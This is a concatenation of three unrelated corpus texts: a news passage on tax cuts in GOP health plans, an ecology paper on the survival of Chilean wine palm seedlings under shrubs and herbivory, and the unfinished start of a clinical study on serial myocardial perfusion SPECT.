In the second bucket are taxes on the drug and medical device industry, which says those levies have a chilling effect on innovation, affect its ability to hire more workers or are passed along to consumers in the form of higher health care prices or premiums. Drug companies would experience an estimated $25.7 billion cut, while medical device makers would get about $19.6 billion in savings. Some of the cuts would start as early as this calendar year.
There’s also relief for insurers. The GOP plans would eliminate a tax set on all insurers based on their market share. Congress waived it for this year, hoping the one-time move would help slow premium increases. The CBO analysis of the Senate bill, for instance, found it would save the industry $144.7 billion over the next decade.
Smaller — but not insignificant — cuts come from eliminating some other taxes, including a limit — $2,600 this year — on how much workers can annually set aside tax-free in flexible spending accounts (FSAs) to pay for things like over-the-counter medications, eyeglasses or copayments for doctor’s office visits. The plans would also increase the amount people could put in tax-protected Health Savings Accounts (HSAs). The Senate proposal would also revert tax law back to pre-ACA days in setting the threshold for medical deductions at 7.5 percent of adjusted gross income; the ACA had boosted that to 10 percent. The House approach is even more generous.
And, of course, not to be forgotten, the GOP plans would delete a 10 percent tax on the use of tanning beds.
You likely won’t see a direct or big tax break unless you are wealthy.
The ACA significantly increased average taxes on high-income people mainly through the investment income tax and the Medicare payroll tax. The top 1 percent and other high earners are also the group that would benefit most from the repeal, according to several analyses, including one by the Tax Policy Center, a nonpartisan think tank in Washington, D.C.
Under the GOP proposals, the top 1 percent — those earning $875,000 a year or more in 2026 — would get an average tax cut of about $40,000, while middle-income people earning about $50,000 to $90,000 would see about a $300 cut, according to Howard Gleckman, a senior fellow at the center.
Still, those earning about $28,000 or less may get a boost from the higher cap on tax-protected FSA or HSA accounts or by being able to deduct medical expenses, possibly saving an average $180 annually, he said.
How will the federal government offset the loss of tax revenue, and what will that mean for insurance or other programs?
Even though the tax cuts and other changes would reduce Treasury revenue by about $700 billion over the next decade, spending cuts exceed that amount, so the deficit actually goes down by $321 billion, the CBO says.
The biggest spending cuts hit the Medicaid program, which provides health coverage for low-income children and adults, including paying for nearly half of all births and much of the cost of nursing home care. Spending on Medicaid by 2026 would shrink by 26 percent compared with what it would be under the ACA.
As to other effects, the number of Americans without health insurance coverage would likely rise. Because the GOP proposals cut the tax people pay for not having insurance, the CBO estimates that far fewer people would enroll in coverage. That, coupled with smaller subsidies to help lower- and middle-income people buy their own insurance and cuts in Medicaid, could lead to 22 million fewer insured Americans by 2026, the CBO estimated. States could choose, however, to try to make up for federal Medicaid spending cuts and maintain current levels of coverage, but that would probably involve raising state taxes, cutting other budget items, such as education, or both.
|
{
"pile_set_name": "OpenWebText2"
}
|
All relevant data are within the paper and its Supporting Information files.
Introduction {#sec001}
============
In arid and semi-arid environments, environmental gradients differ at local scales because shrubs generally improve soil fertility and produce microclimates under their canopies that favor plant-plant interactions \[[@pone.0133559.ref001]\]. According to the stress-gradient hypothesis (SGH) \[[@pone.0133559.ref002]\], interactions among plants vary with environmental conditions, shifting from competition to facilitation as environmental stress increases. Such environmental stress comprises stresses from abiotic and biotic (i.e., consumers) sources. It has been found that plant seedlings growing beneath shrubs have different probabilities of survival than do conspecific seedlings growing in open interspaces between shrubs \[[@pone.0133559.ref003]\].
The occurrence of facilitation interactions under high abiotic stress conditions has been verified by numerous studies in many ecosystems and has provided a crucial basis for empirical studies and theory governing plant-plant interactions in stress-prone Mediterranean environments (see \[[@pone.0133559.ref001]\] and references therein, \[[@pone.0133559.ref003]\]) where tree seedlings benefit from habitat amelioration, especially during summer drought \[[@pone.0133559.ref003]--[@pone.0133559.ref009]\]. However, information on biotic impacts caused by consumers in these environments is still scarce (see \[[@pone.0133559.ref010]\] and references therein). Positive plant-plant interactions should be especially important in plant communities subjected to both climatic stress and biotic stress \[[@pone.0133559.ref002]\], as is the case in Mediterranean-type ecosystems. Surprisingly, the role of herbivory, a common and widespread interaction in arid and semiarid environment, has attracted little attention in this context \[[@pone.0133559.ref011]--[@pone.0133559.ref014]\].
In Mediterranean central Chile, the exotic mammalian herbivores have been altering the structure and functioning of ecosystems \[[@pone.0133559.ref015]\] by, promoting homogenization of species like *Acacia caven* and preventing the recolonization of clearings by woody matorral species on the slopes \[[@pone.0133559.ref008], [@pone.0133559.ref015]\]. It is expected that the impacts of introduced herbivores on native vegetation will be different from the native fauna \[[@pone.0133559.ref016]\], but how plant-plant facilitation relationship may be modulated by animal-plant interactions, specifically in this case, by herbivory, has been frequently neglected.
Valiente-Banuet, Rumebe, \[[@pone.0133559.ref017]\] have indicated that facilitation (or the nurse effect) prevented Tertiary species extinction when climatic conditions became more xeric during the Quaternary, the period during which the current Mediterranean climate emerged. This effect should be of particular importance for the persistence of fleshy-fruited Tertiary species with recalcitrant seeds \[[@pone.0133559.ref017]\] as palms (Arecaceae). Originating in the Cretaceous, palms experienced a spectacular radiation in the Tertiary Early Cenozoic and severe extinction rates due to rainforest decline during the drier Quaternary \[[@pone.0133559.ref018]\]. Thus, relict palms in arid ecosystems, such as the endemic wine palm (*Jubaea chilensis* (Molina) Baill.) in Mediterranean central Chile, constitute a proper candidate for evaluating the relative importance of abiotic and biotic (herbivory) stresses for seedling survival and growth, and for assessing the relationship between animal-plant and plant-plant interactions in arid environments.
Accordingly, we formulated four hypotheses (i) Shrub canopies, by creating a more humid, mesic, and shaded environment relative to open interspaces, differentially affect palm seedling performance. (ii) Shrubs interact positively with wine palm seedlings to facilitate recruitment, buffering the seedlings performance from potentially limiting stresses (SGH) or (iii) seedling performance is facilitated because shrubs protect the seedlings against browsers. In order to study these hypotheses, we monitored growth and herbivore defoliation of 300 wine palm seedlings over a period of 18 months. Seedlings were transplanted outside and under the canopy of the seven most representative shrub species and were grown with and without exclosure protection from browsing. This study can improve our understanding of the relative importance of biotic and abiotic mechanisms for shrub facilitation in the Mediterranean hotspot ecosystem region, which has experienced an increasing frequency, duration, and severity of drought in recent decades \[[@pone.0133559.ref019]\] and has also faced risks associated with the presence of a high proportion of invasive non-native vertebrate herbivores \[[@pone.0133559.ref008], [@pone.0133559.ref015], [@pone.0133559.ref020]\]. Also, this study will help us to examine to fate of wine palm in a context of increasing of aridity and herbivory pressure.
Materials and Methods {#sec002}
=====================
Study species and site {#sec003}
----------------------
This study was conducted in the Oasis La Campana private reserve in central Chile (hereafter La Campana; 71°04\'W; 32°57'S). The CONAF/Parque Nacional la Campana and Reserva Oasis de La Campana issued all of the required permits for the work conducted in those sites. Located in the core zone of the Campana-Peñuelas UNESCO Biosphere Reserve, La Campana covers 17,095 ha and has irregular topography varying from 300 to 1,800 m altitude. The area has a Mediterranean climate, closely equivalent to that of southern California but with a six-month offset. The mean annual rainfall and temperature are 109 mm and 20μC, respectively \[[@pone.0133559.ref021]\]. Rainfall is concentrated in spring and autumn, alternating with hot and dry summers and cold winters. Mean temperatures for December-February are 18°C, and a mean of only 30 mm of precipitation falls from November to April. Winters are mild and moist, and the mean winter temperature, from June to August, is 11°C \[[@pone.0133559.ref022]\].
Mediterranean-type ecosystems have been substantially altered by human activities worldwide, but it is probable that such ecosystems persist to a greater extent in central Chile than in other regions of the world \[[@pone.0133559.ref023]\]. The natural recovery of sclerophyllous vegetation in many open and abandoned areas of central Chile is a slow process \[[@pone.0133559.ref024], [@pone.0133559.ref025]\] due to unsuitable conditions for seedling recruitment and a lack of seed sources. The limiting factors for recruitment include seed deposition in unsafe sites for seed germination and for seedling establishment \[[@pone.0133559.ref024], [@pone.0133559.ref025]\].
The most common evergreen trees and shrubs in La Campana are *Cryptocarya alba* (Lauraceae), *Lithraea caustica* (Anacardiaceae), *Quillaja saponaria* (Quillajaceae), *Maytenus boaria* (Celastraceae), *Kageneckia oblonga* (Rosaceae), and *Peumus boldus* (Monimiaceae) \[[@pone.0133559.ref026]\]. Sclerophyllous forests commonly exhibit a patchy spatial structure, but they may present a continuous canopy in ravines, deep creeks, along permanent water courses and on south-facing slopes \[[@pone.0133559.ref027]\]. On dry north-facing slopes or in frequently disturbed sites \[[@pone.0133559.ref028]\], the sclerophyllous vegetation is often replaced by a xerophytic thorn scrub, with a combination of deciduous shrubs, such as *Retanilla trinervia* (Rhamnaceae), *Colliguaja odorifera* (Euphorbiaceae), *Baccharis linearis* (Compositae), *Acacia caven* (Leguminosae) and *Puya berteroniana* (Bromeliaceae) \[[@pone.0133559.ref026]\]. The palm forest, where this study was conducted, is narrowly distributed within native vegetation and frequently neglected component with numerically abundant populations of the endemic wine palm *Jubaea chilensis* (Molina) Baill ([Fig 1](#pone.0133559.g001){ref-type="fig"}). The wine palm population has been severely fragmented and currently occurs mainly on slopes and in deep canyons of the central Chile Coastal Range \[[@pone.0133559.ref029]\]. It is probable that these sites, with soils of granitic origin, are favorable because of their maritime, moisture-laden air and limited temperature oscillations \[[@pone.0133559.ref023]\].
{#pone.0133559.g001}
La Campana, the heart of the wine palm\'s range, contains the world's largest remnant population of the endemic wine palm, harboring ≈ 60,000 wine palms that represent more than 58% of the total number of native stands \[[@pone.0133559.ref029]\]. The wine palm has a limited distribution but is numerically abundant where it is found (22--113 ind. ha^-1^) \[[@pone.0133559.ref030]\]. It is usually dominant in its favored habitat of slopes and deep canyons with moisture-laden marine air and limited temperature oscillations \[[@pone.0133559.ref027]\].
In central Chile, the biota has been widely and severely impacted by agriculture, human-caused fires, and livestock grazing \[[@pone.0133559.ref022]\], activities that still persist in areas surrounding the study site \[[@pone.0133559.ref031]\]. Introduced species of seedling predators are commonly found within the area. These species, including the invasive European rabbit (*Oryctolagus cuniculus*) \[[@pone.0133559.ref032]\] and livestock \[[@pone.0133559.ref033]\], have potential negative effects on natural regeneration. The study area also holds most of the Mediterranean-type vegetation of central Chile, including hygrophyllous and sclerophyllous forests, *Nothofagus* trees and palm forests \[[@pone.0133559.ref031]\].
The wine palm can attain a height of 25 to 30 m and a trunk diameter of up to 180 cm. The distinctive trunk is usually bulb shaped, with the thickest portion of the trunk above the base of the plant. *J*. *chilensis* produces prolific ovoid fruits in the form of yellow-orange drupes; within each drupe there is a single spherical fruit that is approximately 2--3 cm (0.79--1.18 in) in diameter. The fruit has a very hard endocarp (shell) and a whitish endosperm. The fresh nuts are commonly sold in the areas where the palms grow during their fruiting season (L.A. González, pers. comm.).
Experimental design {#sec004}
-------------------
During the fruiting season of 2004, wine palm seeds were collected from several palm trees. For more than 1,000 individual seeds, seed mass was recorded and the seeds sown in an adjacent nursery cubicle (Reserva Oasis de La Campana). Seedlings were grown from early to late January 2005.
Five months later, more than 300 wine palm seedlings were randomly selected, with initial seedling aerial biomass weighing 0.94 ± 0.02 g (mean ± SE, n = 300). Because the distribution of palms is strongly influenced by the microhabitats within their range \[[@pone.0133559.ref030], [@pone.0133559.ref034]\], which are distributed non-randomly \[[@pone.0133559.ref027]\], three areas with suitable wine palm populations were selected. The conditions of the physical environment under shrub canopies and interspaces between shrubs differ due to variations in vegetation cover (open interspaces between shrubs 7.67 ± 1.36%; under shrub 63.33 ± 1.27%, n = 150) and moisture soils (open interspaces between shrubs 3.23 ± 0.22%; under shrub 5.25 ± 0.22% moisture content), especially during hot, dry summers. These differences can be assumed to result in distinct microhabitats \[[@pone.0133559.ref035]\]. The 75 seedling-performance experimental stations were simultaneously established at minimum distance of 50 m intervals. Seedling-performance experimental stations were spatially independent from another such that we did not detect spatial autocorrelation in seedling survival or growth among stations (average Moran's I-values were not significant for all distance classes).
Each station consisted of four wine palm seedlings and a native shrub of over 1 m of tall, that completely shading the ground surface bellows its crown. Although using different nurse shrub species could cause potential confounding factors, five shrub species have been used due to the species presence and abundance: *A*. *caven*, *R*. *trinervia*, *L*. *caustica*, *B*. *linearis*, *Q*. *saponaria*, *Azara* sp. and *P*. *boldus*, thus ranging a wide spectrum of nurse life forms and architecture. While we cannot altogether discount the possibility of shrub species interacting on herbivory patterns or soil type patterns, our preliminary analysis found no difference between shrub species and wine palm seedling survival (General Linear Model, F = 0.62, df = 6, P = 0.71). In addition, previous studies have shown that the phylogenetic relationship of plants is a weak predictor of the similarity of associated herbivore assemblages, and it may not influence herbivore behavior \[[@pone.0133559.ref036]\].
A two-way fully factorial design was used for the study. The seedlings experienced one of four possible selective regimes generated by selectively weakening the effects of browsers and nurse shrubs independently ([Fig 2](#pone.0133559.g002){ref-type="fig"}). The study design involved the following four combinations of factors: (i) browsers excluded but seedlings under shrub cover; plants were surrounded by a cylinder of wire netting with 1/2-inch mesh openings with a height of 70 cm and buried at least 20 cm deep to exclude browsers, planted under a shrub canopy directly beneath the zone of maximum canopy cover of the most common shrub species ([Fig 3A](#pone.0133559.g003){ref-type="fig"}); (ii) exposed to browsers but under shrub cover, seedlings unfenced to allow herbivore access and planted under the canopy of the most common shrubs ([Fig 3B](#pone.0133559.g003){ref-type="fig"}); (iii) browsers excluded but seedlings without the protection of a shrub canopy, plants surrounded with a 70-cm-high cylinder of wire netting that hampered access by browsers and lacked the potential facilitative effect of nurse plants ([Fig 3C](#pone.0133559.g003){ref-type="fig"}); and (iv) fully exposed plants, unfenced seedlings planted interspaces between shrubs ([Fig 3D](#pone.0133559.g003){ref-type="fig"}).
{#pone.0133559.g002}
{#pone.0133559.g003}
The seedlings were surveyed every four weeks during the first third of the year-long experiment (July 2005 to March 2006) and once in summer (January 2007); hence, 11 sets of measurements were obtained. At each census, all seedlings were identified as alive or dead, distinguishing between abiotic and biotic stress (i.e., dried by stressful environmental conditions or consumed by herbivores); the number of shoots and shoot length individually measured; and examined for herbivore damage, expressed as the difference between the length of an affected shoot and the length previously measured. Two herbivore species, the exotic European rabbit (*Oryctolagus cuniculus*) and the endemic rodent degu (*Octodon degus*) were assessed, as both species usually defecate very close to the areas where they eat \[[@pone.0133559.ref032]\]. Domestic livestock were excluded from the experimental areas.
Data analysis {#sec005}
-------------
The temporal patterns of seedling death were addressed to compare seedling survival among the browser and microhabitat treatments. Curves of seedling survival over time were generated using Kaplan-Meier estimates \[[@pone.0133559.ref037], [@pone.0133559.ref038]\]. The survival functions describe the probability that an individual survives longer than a specified period, considering individuals at risk at the beginning of each interval, i.e., the lapse between two mortality events, and excluding censored values. Browser exclusion, microhabitat, and shrub type were introduced as factors \[[@pone.0133559.ref038]\]. A log rank (Mantel-Cox) test \[[@pone.0133559.ref039]\] was used to compare pairs of survival functions. The consequences of microhabitat, browsers, and their interaction for *J*. *chilensis* seedlings were assessed by fitting General Linear Mixed Models (GLMMs) separately to the seedling survival and seedling growth data for 2005--2007. The dependent variable in the models was the number of seedlings surviving in each plot or the difference in seedling biomass from the beginning on the experiment to the end. Exclusion from browsers and microhabitat and two-way interactions were inserted in the models as fixed effects. Time was included in the 'repeated' statement, where the scores were nested within individuals. Computations were performed with the SAS MIXED procedure and restricted maximum likelihood estimation \[[@pone.0133559.ref040]\]. A Pearson correlation coefficient was used to quantify the relationship between seed size and log-transformed seedling growth. We tested the data for conformity with the assumption of homogeneous variances. All comparisons reported used two-tailed significance tests at the 0.05 level and were performed with R \[[@pone.0133559.ref041]\] except for GLMMs fitted with the PROC MIXED package of SAS version 9.1 (SAS Institute Inc., Cary, NC). All relevant data are presented in [S1 Table](#pone.0133559.s001){ref-type="supplementary-material"}.
Results {#sec006}
=======
Our results show that for *Jubaea chilensis*, seedling survival and growth were not affected by seed size (Pearson correlation, P \> 0.05 for both comparisons). In fact, no differences in seedling growth were observed among treatment groups. The mean seedling growth was 0.94 ± 0.02 g and did not vary according to the microhabitat, shrub type or herbivore access (General Linear Mixed Model, P \> 0.05 for all comparisons, [Table 1](#pone.0133559.t001){ref-type="table"}). However, survival depended heavily on protection from vertebrate herbivores. By the end of the 18-mo period, 42 (14%) of the 300 seedlings remained alive, with 109 affected by abiotic unsuitable conditions (dried seedlings) and 149 lethally attacked by vertebrates.
10.1371/journal.pone.0133559.t001
###### General linear mixed model effects.
{#pone.0133559.t001g}
Atribute Treatment *F* *df* *P*
----------------- ---------------------------------- ------- ------ ------
Survival Brownser access × nursing effect 21.43 1 0.00
Nursing effect 3.86 1 0.05
Brownser access 488.19 1 0.00
Growth Brownser access × nursing effect 1.65 1 0.20
Nursing effect 0.38 1 0.54
Brownser access 1.65 1 0.20
The seedlings that were accessible to browsers suffered higher mortality rates than those that were enclosed and inaccessible to vertebrates (F = 488.19, df = 1, P \< 0.0001, [Table 1](#pone.0133559.t001){ref-type="table"}). Regardless of microhabitat (outside and under shrub canopy), unfenced seedlings had negligible survival (n = 1, Figs [4](#pone.0133559.g004){ref-type="fig"} and [5](#pone.0133559.g005){ref-type="fig"}), with more than 95% of deaths evidently produced by biotic stress and a minor proportion triggered by abiotic stress (1.3% under canopy shrubs; 3.5% open canopy), showing that shrubs do not provide protection against herbivores as seedlings showed the same survival probability when exposed to browsers in the open interspaces between shrubs and under shrubs. However, an interaction between microhabitat and seedling protection was observed for seedling survival (F = 21.43, df = 1, P \< 0.0001, [Table 1](#pone.0133559.t001){ref-type="table"}), with better performance of fenced seedlings under shrub canopies ([Fig 4](#pone.0133559.g004){ref-type="fig"}).
{#pone.0133559.g004}
{#pone.0133559.g005}
The probability of seedlings remaining alive differed significantly between treatments ([Fig 5](#pone.0133559.g005){ref-type="fig"}), with earlier deaths in wine palm seedlings that were exposed to herbivores. Fenced seedlings had an estimated mean time (± SE) to failure of 331 ± 19 and 433 ± 18 days for open interspaces between shrubs and growth under shrub canopy, respectively, much longer than the mean time predicted for seedlings accessible to browsers (under canopy = 85 ± 9 days; fully exposed seedlings = 114 ± 11 days). The proportion of caged seedlings died under the shade of shrubs canopies was lower than those exposed to browsers attack but under shrub cover (log-rank, χ^2^ = 128.34, P \< 0.0001), or than those inaccessible to browsers but seedlings without the protection of a shrub canopy (χ^2^ = 10.20, P = 0.001) or than those fully exposed seedlings, i.e., unfenced seedlings planted in open interspaces between shrubs (χ^2^ = 118.99, P \< 0.0001). In fact, caged and unshaded wine palm seedlings survived longer than those under shrub canopies exposed to browsers (χ^2^ = 102.41, P \< 0.0001) and or than those fully exposed seedlings (χ^2^ = 116.24, P \< 0.0001). However, the survival of wine palm seedlings was not influenced by nurse shrub protection on those seedlings open to browser (χ^2^ = 3.5, P \> 0.05, [Fig 4](#pone.0133559.g004){ref-type="fig"}).
Discussion {#sec007}
==========
Our findings from experimentally decoupling the herbivory and abiotic effects on wine palm seedling performance support the scarce empirical evidence indicating that semi-arid ecosystems have a strong impact on plant-plant interactions \[[@pone.0133559.ref011], [@pone.0133559.ref013], [@pone.0133559.ref014]\]. The intensity of shade-induced facilitation of growth did not differ during the course of the experiment, whereas its effect on survival did vary. The effects of shrub interactions on seedling survival differ from their effects on growth have been previously observed \[[@pone.0133559.ref042], [@pone.0133559.ref043]\], and that the intensity of facilitation of growth by shade did not vary with adverse environmental conditions may be consistent with other studies \[[@pone.0133559.ref042], [@pone.0133559.ref044], [@pone.0133559.ref045]\]. Once wine palm seedlings are able to escape from herbivores, the facilitative effect on modifying environmental conditions seem to null or at least reduce as seedlings showed similar growth in the ameliorated conditions under the shrubs and in the harsh open canopy. The effects of facilitation on survival and growth may vary simultaneously, probably as a consequence of differences in environmental requirements according to the plant life-stage.
Desiccation during the summer and consumption by vertebrate herbivores, most likely due to the introduced and invasive European rabbit (*Oryctolagus cuniculus*), are important sources of wine palm seedling mortality. Contrary to our hypothesis, herbivory, rather than harsh environmental conditions, is the strongest inhibiting effect on *Jubaea* seedling establishment. Other studies have also shown that biotic filters mediated by animal-plant interactions might be more important than abiotic filters in the early life stages of plants \[[@pone.0133559.ref046]--[@pone.0133559.ref048]\]. Nevertheless, in the absence of consumer pressure, the abiotic mechanism of facilitation by nurse shrubs was observed for survival but not for seedling growth.
Our findings provide only partial support for the SGH \[[@pone.0133559.ref002]\], as facilitation did not increase seedling survival or growth under high herbivore pressure (biotic stress). However, seedling establishment and growth depend presumably on the combined effect of biotic and abiotic filters and shrubs cannot provide the facilitative effects of abiotic stress amelioration and protection against herbivores. Thus, under extreme conditions, survival may not be possible even in the presence of positive interactions because shrubs do not facilitate seedling performance by providing protection against browsers, the primary and pervasive constraint to *Jubaea* seedling establishment. In contrast, at intermediate or low levels of herbivory, the wine palm seedlings are able to overcome mortality due to herbivore consumption and higher survival of shaded plants is a result of facilitation provided by shrubs due to the creation of a more humid, mesic and shaded environment, especially during summer, thus supporting the SGH. However, at high stress levels, with elevated consumer pressure, the net positive effect disappears. These results concur with the predictions Smit, Rietkerk \[[@pone.0133559.ref010]\] corroborated by Saiz and Alados \[[@pone.0133559.ref013]\], Graff and Aguiar \[[@pone.0133559.ref049]\], and Graff, Aguiar \[[@pone.0133559.ref050]\].
In low-productivity sites such as semi-arid Mediterranean habitats, stress-adapted herbivore species appear to compensate for nutritionally poor food by increasing the content of their diet, changing their foraging behavior by tending to be less selective, and increasing their feeding area \[[@pone.0133559.ref049], [@pone.0133559.ref051], [@pone.0133559.ref052]\]. Fuentes, Jaksic \[[@pone.0133559.ref032]\] demonstrated that in the central Chile, the European rabbit (*Oryctolagus cuniculus*) and the degu (*Octodon degus*), an endemic rodent, show differential killing effects on native vegetation, with the rabbits foraging over wide areas while the degu restricting its search activity to an area a few meters from their refuges. Jaksic, Fuentes, \[[@pone.0133559.ref053]\] add that kitten and juvenile rabbits are ecologically comparable to degu, limiting their foraging to areas under the canopy \[[@pone.0133559.ref016]\] possibility for explaining the observed widespread high mortality of unfenced wine palm seedlings and weakening the facilitative effect of shrub canopies.
From a conservation and management perspective, small invasive consumers such as the alien rabbit play a major role in shaping vegetation dynamics, with consequences for biodiversity worldwide (\[[@pone.0133559.ref054]\], see \[[@pone.0133559.ref055]\]). This form of herbivory is one of the main causes of the lack of seedlings in stands of the endangered *J*. *chilensis*, a relict coming from the Tertiary Early Cenozoic that resisted even severe extinction rate due to rainforest decline in the Quaternary. Thus, the sensitivity of how plant-plant facilitation might be affected to perturbation could cause important disruptions in ecosystems modifying the species recruitment patterns. In extreme cases, herbivore overbrowsing can have profound effects on ecosystem processes through overconsumption, effectively reducing the diversity and carrying capacity for consumers and potentially leading to extinction or even to ecological meltdown \[[@pone.0133559.ref056], [@pone.0133559.ref057]\].
Our results show that despite the facilitation effect that nursing shrubs have on wine palm seedling establishment, recolonization of open spaces is possible without the facilitation of a nurse shrub, but protection of young wine palm seedlings is obligatory to enable them to attain a height at which shoots are no longer vulnerable to browsing.
Our findings also stress the importance of assessing the influence of sources of biotic stress, specifically herbivory, on plant interactions as part of the effective planning for the preservation, restoration and management of arid and semi-arid ecosystems. Invasive vertebrate herbivores in natural ecosystems has being recorded all over the world (e.g. \[[@pone.0133559.ref057]\], \[[@pone.0133559.ref058]\], \[[@pone.0133559.ref059]--[@pone.0133559.ref063]\]) once both fragmented and continuous landscapes are suffering from the human-induced disturbances, with strong implications for the persistence of key ecosystem processes. We highlight the importance of assessing the impact of invasive mammals on ecosystems, as the invaders might limit seedling establishment not only for the studied species but other plant species, as well as affecting all steps of the recruitment process, with ensuing impacts on the population dynamics of the affected plants.
Supporting Information {#sec008}
======================
###### Wine palm seedling survival and growth among treatments.
(XLSX)
######
Click here for additional data file.
The authors are thankful for the assistance of Ronny Zúñiga, and for the helpful input and encouragement from Juan Armesto and Javier Simonetti. We thank the anonymous reviewers for their valuable suggestions and constructive comments.
[^1]: **Competing Interests:**The authors have declared that no competing interests exist.
[^2]: Conceived and designed the experiments: WM LAG RAV ROB. Performed the experiments: WM. Analyzed the data: MF. Contributed reagents/materials/analysis tools: WM. Wrote the paper: MF. Provided editorial advice: WM LAG RAV ROB.
[^3]: Current address: Instituto de Conservación, Biodiversidad y Territorio, Facultad de Ciencias Forestales y Recursos Naturales, Universidad Austral de Chile, Valdivia, Chile
|
{
"pile_set_name": "PubMed Central"
}
|
INTRODUCTION
============
Stress myocardial perfusion imaging using single-photon emission computed tomography (SPECT) is commonly used for risk stratification and therapeutic decision making in patients with coronary artery disease (CAD).[@B1][@B2][@B3] Since ischemia is a strong predictor of adverse outcomes, such as death or myocardial infarction (MI),[@B4][@B5] detecting ischemia is an important part of the diagnostic strategy for patients with stable CAD. In addition to the diagnostic and prognostic utility of myocardial perfusion SPECT, the extent of ischemia is one of the primary measures that drives decisions regarding revascularization.[@B6][@B7][@B8] Patients with moderately or severely abnormal myocardial perfusion SPECT have significantly higher mortality rates if treated with medical therapy alone.[@B5][@B7] Previous studies on myocardial perfusion SPECT have focused on the prognostic utility of stress imaging as the initial test for patients with CAD.[@B8][@B9] However, there are only a few studies that show a relationship between the presence and severity of ischemia and prognosis during CAD treatment.[@B10][@B11][@B12] Therefore, according to the current guidelines and appropriate use criteria for follow-up of CAD, routine stress imaging is not recommended, except for special high-risk groups after coronary revascularization.[@B13][@B14] Hence, in the current study, we aimed to assess the clinical implications of serial myocardial perfusion SPECT in patients with CAD who were receiving either medication or revascularization therapy.
MATERIALS AND METHODS
=====================
Study population
----------------
We identified consecutive patients who underwent serial myocardial perfusion SPECT, had abnormal results on a first study \[which was defined as summed stress score (SSS) ≥3\],[@B15] and had follow-up adenosine stress SPECT at an interval ≥6 months between the two studies that were performed between January 1, 2000 and June 31, 2014. Patients were also excluded if they had MI \<3 months before initial SPECT, previous revascularization therapy, serious non-coronary heart disease, including cancer with a life expectancy less than one year, incomplete nuclear data, multiple coronary revascularizations between the two SPECT procedures, and no clinical follow-up information. As a result, a total of 1153 patients with serial SPECT studies were included ([Fig. 1](#F1){ref-type="fig"}). Because of the retrospective nature of the study, a waiver for individual informed consent was granted by the Institutional Review Board.
Myocardial perfusion imaging
----------------------------
Thallium-201 (Tl-201) SPECT was the default stress myocardial perfusion imaging used during the study period. Images were acquired with a standardized protocol.[@B16] Adenosine was intravenously administered at a rate of 140 mcg/kg/minute for 6 min. Three minutes after the initiation of the adenosine infusion, a dose of Tl-201 (range=92.5--148 MBq, as determined by the patient\'s body weight) was intravenously injected. Six minutes after adenosine infusion, post-stress myocardial perfusion images were acquired using two-head gamma cameras equipped with low-energy, all-purpose collimators. The specific acquisition parameters were dependent on the camera.
Image interpretation
--------------------
Semi-quantitative visual interpretation was performed by independent expert interpreters, using 17 segments for the severity and extent of abnormalities on stress imaging.[@B17] Each segment was scored using a 5-point scoring system (0=normal; 1=equiv-ocal; 2=moderate; 3=severe reduction in radioisotope uptake; 4=absence of detectable tracer uptake in a segment), as previously described.[@B18] The score that was summed from the stress scan was defined as the SSS: SSS was determined by adding the scores of the 17 segments on the stress images. The SPECT study was considered to be abnormal if the SSS was 3 or greater. According to the result of follow-up myocardial perfusion SPECT, patients were categorized into normal and abnormal groups.
Procedure and follow-up
-----------------------
Coronary angiography was recommended for patients on the basis of their clinical presentation and the results of the noninvasive stress test. Significant stenosis on coronary angiography was defined as \>50% stenosis in an epicardial coronary artery. In patients with significant stenosis, the decision to perform revascularization or medical therapy was at the discretion of the individual cardiologist. Percutaneous coronary intervention (PCI)[@B19] or coronary artery bypass graft (CABG) surgery was performed using standard techniques.[@B20] Medical treatment was performed with a medical regimen that consisted of at least antiplatelet, antianginal, and lipid-lowering therapies.[@B3] After index myocardial perfusion SPECT, patients received either medical treatment or revascularization treatment.
Definitions
-----------
The primary outcome of interest was the occurrence of major adverse cardiac events (MACE), which was the composite of all-cause death, nonfatal MI, or unplanned revascularization after follow-up myocardial perfusion SPECT. When patients received multiple serial myocardial perfusion SPECTs, the first follow-up SPECT with an interval of ≥6 months after the index myocardial perfusion SPECT was selected for analysis. An MI was defined as elevated cardiac enzymes (troponin I or myocardial band fraction of creatine kinase) more than the upper limit of the normal value with ischemic symptoms or electrocardiography findings that were indicative of ischemia. After follow-up myocardial perfusion SPECT, any further PCI or CABG (excluding planned staged PCI) was considered an unplanned revascularization. Death, non-fatal MI, and unplanned revascularizations were verified by reviewing medical records.
Statistical analysis
--------------------
The continuous and categorical covariates are summarized as a mean±standard deviation or count (%). According to the follow-up myocardial perfusion SPECT results, all patients were divided into normal and abnormal groups. The baseline patient characteristics were compared between the two groups using the t test or Fisher exact test for continuous and categorical variables, respectively. The cumulative incidence of MACE for the normal and the abnormal groups was obtained using the Kaplan-Meier method and compared between the two groups using the log-rank test. To examine the effect of abnormal results on MACE and its individual events, the unadjusted and adjusted Cox proportional hazards regression models were fitted. Covariates that were statistically significant in univariate analysis and/or those that were clinically relevant were considered candidate variables for multivariate models. In the Cox model, the proportionality assumptions were assessed using the Scho-enfeld residual test, and no relevant violations were detected.
To reduce treatment selection bias and potential confounding, propensity score (PS)-matching analysis was performed. The PS of obtaining the abnormal myocardial perfusion SPECT results was estimated using the nearest-neighbor matching method with a caliper width of 0.2. The considered variables for the PS were age, sex, body mass index, hypertension, diabetes mellitus, current smoking, hyperlipidemia, prior revascularization treatment, chronic pulmonary disease, chronic renal failure, creatinine, total cholesterol, left ventricular (LV) ejection fraction \<50%, and the use of beta blockers, calcium channel blockers (CCB), angiotensin converting enzyme inhibitor (ACEi), angiotensin receptor blocker (ARB) agents, or statins, which are listed in [Table 1](#T1){ref-type="table"}. In general, covariate balancing was considered to be achieved as long as the absolute standardized difference of the means or proportions was \<0.25. In the PS analyses, no violations of covariate balancing were detected ([Supplementary Fig. 1](#S2){ref-type="supplementary-material"}, only online). For the PS-matched cohorts, continuous variables were compared using the paired t test or the Wilcoxon signed-rank test, as appropriate, and the categorical variables were compared using the McNemar\'s or Bowker\'s test of symmetry, as appropriate. A subgroup analysis was performed according to the treatment groups. Furthermore, univariate and multivariate logistic regression analyses were performed to identify independent clinical predictors of having abnormal results on follow-up myocardial perfusion SPECT. In the multivariable logistic regression, we employed a backward variable selection approach based on the *p* values. The significance level for staying in the model was set to 0.05. All statistical analyses were performed using SPSS (version 19.0 software; IBM Corp., Armonk, NY, USA) and R software (version 2.13; R Foundation for Statistical Computing, Vienna, Austria; <http://www.r-project.org>). Additionally, the R package MatchIt was used to conduct the PS analysis.[@B21] All tests were two-tailed, and *p*\<0.05 was considered statistically significant.
RESULTS
=======
Overall population
------------------
### Baseline characteristics
